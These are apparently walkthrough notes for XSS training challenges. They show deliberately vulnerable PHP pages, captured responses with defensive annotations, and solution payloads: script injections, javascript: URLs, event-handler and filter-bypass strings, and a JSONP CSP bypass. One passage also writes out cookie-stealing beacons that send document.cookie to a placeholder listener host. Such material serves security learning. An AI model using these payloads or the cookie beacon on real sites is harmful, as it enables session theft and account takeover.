xss

xss challenges by int21h

stage 1

<!-- Stage 1: a search form that POSTs p1 back to the same page (the sid
     query parameter is presumably the challenge session id). -->
<form method="post" action="?sid=3b4530debfc45d8e44d05547567e54ccb348e190">
Search: <input name="p1" type="text" value="" size="60">
<input type="submit" value="Search">
</form>

stage 2

<!-- Stage 2: same search form as stage 1, framed by two rules; p1 is
     POSTed back to the same page. -->
<form method="post" action="?sid=454ea068a1791c26fe09f235c31fdaf523b7ecfd">
<hr class="red">
Search: <input name="p1" type="text" value="" size="60">
<input type="submit" value="Search">
<hr class="red">
</form>
%}

stage 3

<!-- Stage 3 response as captured. The hint states the text box (p1) is
     escaped, so the remaining reflection point is the p2 country value,
     which the page writes into the option list. -->
<b>Hint:</b> <span id="hide">The input in text box is properly escaped.</span>
<input type="hidden" name="key" value="tubhf%605/qiq" />
<form action="?sid=0a6d663df55034885f64633e535afb4c5a1a1b30" method="post">
Search a place: <input type="text" name="p1" size="30" />
<input type="submit" value="Search" /> &nbsp; Choose a country:
<select name="p2">
<!-- <option>Japan</option> -->
<option>Japan</option>
<!-- The lines from "//" through the closing option below appear to be the
     submitted p2 value echoed without encoding. A select element is no
     protection: a client can send any string as p2. Server-side fix:
     htmlspecialchars() on p2, or map p2 onto an allowlist of countries
     before it is written into the page. -->
//
<option>
<script>
alert(1);
</script>
</option>
<option>Germany</option>
<option>USA</option>
<option>United Kingdom</option>
</select>
</form>
<span id="msg" style="display:none"></span>
<p></p>
<hr />

stage 4

<!-- Stage 4 form: p1, p2 and a hidden p3 are POSTed to the same page. A
     hidden field is still request data that any client can set freely. -->
<form method="post" action="?sid=f259051837d00c498286decbebd9332a93941de0">
Search a place: <input name="p1" type="text" size="30">
<input type="submit" value="Search"> &nbsp; Choose a country:
<select name="p2">
<option>Japan</option>
<option>Germany</option>
<option>USA</option>
<option>United Kingdom</option>
</select>
<input name="p3" type="hidden" value="hackme">
</form>
<!-- Fragment of the stage 4 response when p3 (the hidden field) carries
     markup: a quote closes the value attribute and the remainder is parsed
     as new elements. A hidden input is attacker-controlled input like any
     other and needs the same attribute-context encoding as a visible one. -->
<input type="show" name="p3" value="" />
<script>
alert(document.domain);
</script>
">

stage 5

<hr class="red" />
<!-- Stage 5: maxlength="15" is enforced only by the browser; the second
     input shows the same field with maxlength="50" (presumably edited on
     the client). A length limit in markup is not validation: the server
     must enforce any limit it relies on. -->
Search: <input type="text" name="p1" maxlength="15" size="30" value="" /> //
<input type="text" name="p1" size="30" value="" maxlength="50" />

stage 6

??? {% spoiler onmouseover=alert(document.domain)

stage 7

???

arst onmouseover=alert(document.domain) %}

stage 8

JavaScript pseudo-protocol (JavaScript 伪协议)
<form action="?sid=19ed8385d5064a30fee35d44597cc90d2103e5b9" method="post">
Input a URL: <input type="text" name="p1" size="50" />
<input type="submit" value="Make a Link" />
<hr class="red" />
URL:
<!-- The submitted p1 is reflected into both the href and the link text with
     < and > turned into entities, so markup injection fails here. The href
     is still a URL context: whatever scheme the browser accepts is honoured.
     Entity encoding is not sufficient for an href; the server should
     allowlist the scheme (http/https) before emitting the link. -->
<a href='"&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;'
>"&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;</a
>
<hr class="red" />
</form>
{% spoiler javascript:alert(document.domain)

stage 9

???

<form action="?sid=7e2329d79d97959657ca5b762ed3314b0fbe5f00" method="post">
<hr class="red" />
No results for your Query. Try again:
<!------------------------------------------------>
<!-- p1 is reflected into value='...' with < and > entity-encoded. The form
     also carries a "charset" field (euc-jp). If the response charset follows
     that parameter (not visible here; confirm against the server), the risk
     is that output encoding is only correct for the charset the browser
     actually decodes with. Fix: the server sets a fixed charset in its own
     Content-Type header and never lets a request parameter choose it. -->
<input
type="text"
name="p1"
size="50"
value='"&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;'
/>
<input name="charset" value="euc-jp" type="text" />
<!------------------------------------------------>

<input type="submit" value="Search" />
<hr class="red" />
</form>

stage 10

<form action="?sid=3dbc35c98d4e77299ef69405ec1bd1ae7f6fdc56" method="post">
<hr class="red" />
No results for your Query. Try again:
<!-- p1 is reflected inside value="" without encoding, so the submitted
     string closed the attribute and started a script element (captured
     below). The word "domain" was removed from the input (alert(document.)
     is what remains of alert(document.domain)): a word blacklist instead of
     output encoding. Removing substrings is not a defense; encode the value
     for the attribute context instead. -->
<input type="text" name="p1" size="50" value="" />
<script>
alert(document.)
</script>
"&gt;
<input type="submit" value="Search" />
<hr class="red" />
</form>
onmouseover=alert(document.domdomainain)

stage 11-

??

XSS Challenge by y0n3uchy

Baby XSS 01

Reflected XSS

<script src="hook.js"></script>
<!-- Sink: the raw GET parameter is written straight into the document with
     no output encoding, so any markup in ?payload= is parsed by the browser.
     Fix for a real page: echo htmlspecialchars($_GET["payload"], ENT_QUOTES, 'UTF-8'); -->
<?php echo $_GET["payload"]; ?>

<h1>inject</h1>
<form>
<input type="text" name="payload" placeholder="your payload here" />
<input type="submit" value="GO" />
</form>

<h1>src</h1>
<!-- Prints this file's own source for the challenge; harmless here, but
     serving source verbatim is not something a production page should do. -->
<?php highlight_string(file_get_contents(basename(__FILE__))); ?>
<script>
// What a successful injection on Baby XSS 01 leads to: document.cookie is
// sent to a remote host in an image request (the host/port here is a
// placeholder, not a real endpoint).
// Defensive notes: a cookie set with the HttpOnly flag is not exposed through
// document.cookie; a CSP whose img-src / connect-src omits foreign origins
// blocks both requests below; a cookie value inside a GET query string to an
// unknown host is a detection signal in proxy or egress logs.
new Image().src =
"http://YOUR_LISTENING_SERVER_IP:PORT/?cookie=" +
encodeURIComponent(document.cookie);
</script>

<script>
// Same beacon via fetch(); connect-src governs this one, img-src the one above.
fetch("http://YOUR_LISTENING_SERVER_IP:PORT/?cookie=" + document.cookie);
</script>

Baby XSS 02

DOM-based XSS

<script src="hook.js"></script>
<script>
// DOM-based: the source is location.hash, which the browser never sends to
// the server (server-side filters and access logs do not see it), and the
// sink is innerHTML. decodeURI() undoes percent-encoding before the string
// is parsed as HTML. window.query presumably resolves to the <p id="query">
// below via named access. Fix: assign through textContent, not innerHTML.
window.addEventListener("load", function () {
var q = location.hash.substring(1);
window.query.innerHTML = q == "" ? `Hello!` : `Hello, ${decodeURI(q)}`;
});
</script>

<p id="query"></p>

<h1>inject</h1>
<p>Inspect the source code carefully and find where to inject :-)</p>

<h1>src</h1>
<?php highlight_string(file_get_contents(basename(__FILE__))); ?> ``
url#<img src="x" onerror="alert(document.cookie)" />

Baby XSS 03

<script src="hook.js"></script>
<!-- htmlspecialchars() keeps the value from breaking out of text or a quoted
     attribute, which is why the heading is safe. -->
<?php $escaped = htmlspecialchars($_GET['payload']); ?>

<!-- The same value is placed at the START of each href, so it also decides
     the URL scheme, and a scheme contains no character htmlspecialchars()
     rewrites. Fix: allowlist the scheme, or never let user input form the
     beginning of a URL. -->
<h1>Hello, <?= $escaped ?></h1>
<a href="<?= $escaped ?>/friends">Friends</a>
<a href="<?= $escaped ?>/post">Posts</a>
<a href="<?= $escaped ?>/settings">Settings</a>

<h1>inject</h1>
<form>
<input type="text" name="payload" placeholder="your payload here" />
<input type="submit" value="GO" />
</form>

<h1>src</h1>
<?php highlight_string(file_get_contents(basename(__FILE__))); ?>
javascript:alert(XSS)

Baby XSS 04

??? ${alert('XSS')}

No Alphabets and Digits

???

JSFuck

No Parentheses

ES6 标签模板 (Tagged Templates)

alert`1`;

same as alert(1)

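<script src="hook.js"></script>
<?php
// you cannot do anything without ...

// no parentheses ...
// Removes every "(" and ")" from the raw GET parameter in a single pass;
// nothing is encoded, only deleted.
$escaped = preg_replace("/[()]/", "", $_GET['payload']);

// no event handlers!
// Any line of the payload that contains an "o" followed later by an "n"
// (case-insensitive) is removed entirely; this is how the filter tries to
// block on*= handler attributes.
// NOTE(review): both steps are character/word blacklists, and the result is
// echoed below without htmlspecialchars(), so < > " and = pass through.
// The fix for a real page is output encoding for the HTML text context.
$escaped = preg_replace("/.*o.*n.*/i", "", $escaped);
?>

<h1>Hello, <?= $escaped ?>!</h1>


<h1>inject</h1>
<form>
<input type="text" name="payload" placeholder="your payload here">
<input type="submit" value="GO">
</form>

<h1>src</h1>
<?php highlight_string(file_get_contents(basename(__FILE__))); ?>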

No Quotes

String.fromCharCode() converts an ASCII code to a character.

<script src="hook.js"></script>
<?php
// by escaping the payload you won't break this system, haha! :-)
// Deletes the characters ' " ` & and # and nothing else: < > = / and
// parentheses survive, and the result is echoed below without
// htmlspecialchars(). Deleting characters is not encoding; the fix is to
// encode at the point of output for the HTML text context.
$escaped = preg_replace("/['\"`&#]/", "", $_GET['payload']);
?>

<h1>Hello, <?= $escaped ?>!</h1>

<h1>inject</h1>
<form>
<input type="text" name="payload" placeholder="your payload here">
<input type="submit" value="GO">
</form>

<h1>src</h1>
<?php highlight_string(file_get_contents(basename(__FILE__))); ?>

No Parentheses Again

URL 解析机制 + javascript: 伪协议

<script src="hook.js"></script>
<?php
// Strips ` ( ) < > & # from the raw value. Note what is NOT stripped: the
// double quote, which is the one character that terminates the id="..."
// attribute this value is written into below.
$escaped = preg_replace("/[`()<>&#]/", "", $_GET['payload']);
?>

<!-- Two treatments of the same parameter on one line: the id attribute gets
     the character-stripped copy (attribute context, quote not removed), the
     text node gets htmlspecialchars() (correct for text). The attribute is
     the sink; it needs htmlspecialchars() with quote encoding as well. -->
<h1>Hello, <span id="<?= $escaped ?>"><?= htmlspecialchars($_GET['payload']) ?></span>!</h1>

<h1>inject</h1>
<form>
<input type="text" name="payload" placeholder="your payload here">
<input type="submit" value="GO">
</form>

<h1>src</h1>
<?php highlight_string(file_get_contents(basename(__FILE__))); ?>
onmouseover=location=javascript:alert%28%22XSS%22%29

Replacement

???

<scr<script>ipt>alert(1)</script>

Reining the Web by Whitelisting

JSONP (JSON with Padding)

<!-- CSP: default-src 'self' with no 'unsafe-inline' for scripts, so inline
     <script> blocks injected into the heading are refused by the browser. -->
<?php header("Content-Security-Policy: default-src 'self'; style-src 'unsafe-inline'"); ?>
<script src="hook.js"></script>

<script src="csp01-util.js"></script>
<!-- 'self' still permits any script served from this origin, and
     csp01-jsonp.php takes its callback name from the URL (the endpoint is
     not on this page; presumably it writes the name into the JS it returns).
     A same-origin JSONP endpoint therefore weakens an allowlist CSP.
     Mitigations: validate callback as a strict identifier on the endpoint,
     or move to a nonce/hash-based policy with 'strict-dynamic'. -->
<script src="csp01-jsonp.php?callback=callback"></script>

<!-- The payload itself is still echoed without encoding; CSP is a second
     layer, not a replacement for htmlspecialchars() here. -->
<h1>Hello, <?= $_GET['payload'] ?>!</h1>

<h1>inject</h1>
<form>
<input type="text" name="payload" placeholder="your payload here" />
<input type="submit" value="GO" />
</form>

<h1>src</h1>
<?php highlight_string(file_get_contents(basename(__FILE__))); ?>